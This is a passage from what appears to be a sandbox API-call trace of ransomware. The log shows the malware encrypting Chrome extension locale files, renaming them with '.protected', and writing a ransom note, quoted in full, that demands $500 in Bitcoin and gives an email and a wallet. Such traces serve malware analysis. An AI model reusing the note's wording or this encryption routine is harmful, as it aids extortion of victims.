0x47bc10 [0079.761] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.761] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.761] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.761] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.761] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.761] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\.") returned 145 [0079.761] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.761] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.762] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.762] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.762] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.762] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.762] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.762] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\..") returned 146 [0079.762] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.762] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.762] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.762] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.762] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.762] lstrcmpiW (lpString1="messages.json", lpString2="Program 
Files (x86)") returned -1 [0079.762] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.762] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.762] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json") returned 157 [0079.762] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.762] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.762] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.762] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.762] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json") returned 157 [0079.762] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.762] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json") returned 157 [0079.762] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.762] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json") returned 157 [0079.762] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.762] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.763] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.763] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.763] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.763] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.763] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.763] CloseHandle (hObject=0x168) returned 1 [0079.764] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json.protected") returned 167 [0079.764] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json.protected")) returned 1 [0079.764] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.764] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.764] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\RESTORE_FILES.txt") returned 161 [0079.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.765] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.765] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.765] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.765] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.766] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.766] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.766] CloseHandle (hObject=0x164) returned 1 [0079.766] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.766] lstrcmpiW (lpString1="hi", lpString2="Windows") returned -1 [0079.766] lstrcmpiW (lpString1="hi", lpString2="Program Files") returned -1 [0079.766] lstrcmpiW (lpString1="hi", lpString2="Program Files (x86)") returned -1 [0079.766] lstrcmpiW (lpString1="hi", lpString2="$Recycle.bin") returned 1 [0079.766] lstrcmpiW (lpString1="hi", lpString2="System Volume Information") returned -1 [0079.766] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi") returned 143 [0079.766] lstrcmpW (lpString1="hi", lpString2=".") returned 1 [0079.766] lstrcmpW (lpString1="hi", lpString2="..") returned 1 [0079.766] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\*") returned 145 [0079.766] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.767] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.767] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.767] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.767] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.767] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.767] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\.") returned 145 [0079.767] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.767] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.767] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.767] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.767] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 
[0079.767] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.767] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.767] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\..") returned 146 [0079.767] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.767] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.767] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.767] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.767] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.767] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.767] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.767] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.767] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json") returned 157 [0079.767] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.767] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.767] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.767] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.767] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.768] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json") returned 157 [0079.768] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.768] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json") returned 157 [0079.768] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.768] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json") returned 157 [0079.768] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.768] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.769] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.769] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 
1 [0079.769] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.769] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.769] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.769] CloseHandle (hObject=0x168) returned 1 [0079.769] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json.protected") returned 167 [0079.769] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json.protected")) returned 1 [0079.770] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.770] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.770] wnsprintfW (in: 
pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\RESTORE_FILES.txt") returned 161 [0079.770] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.770] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.770] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.771] lstrlenA (lpString="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") returned 684 [0079.771] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.771] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.771] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0079.771] CloseHandle (hObject=0x164) returned 1 [0079.771] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.771] lstrcmpiW (lpString1="hr", lpString2="Windows") returned -1 [0079.771] lstrcmpiW (lpString1="hr", lpString2="Program Files") returned -1 [0079.771] lstrcmpiW (lpString1="hr", lpString2="Program Files (x86)") returned -1 [0079.771] lstrcmpiW (lpString1="hr", lpString2="$Recycle.bin") returned 1 [0079.771] lstrcmpiW (lpString1="hr", lpString2="System Volume Information") returned -1 [0079.771] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr") returned 143 [0079.771] lstrcmpW (lpString1="hr", lpString2=".") returned 1 [0079.771] lstrcmpW (lpString1="hr", lpString2="..") returned 1 [0079.771] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\*") returned 145 [0079.771] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.771] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.771] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.771] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.772] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.772] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.772] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\.") returned 145 [0079.772] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.772] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.772] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.772] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.772] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.772] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.772] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.772] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 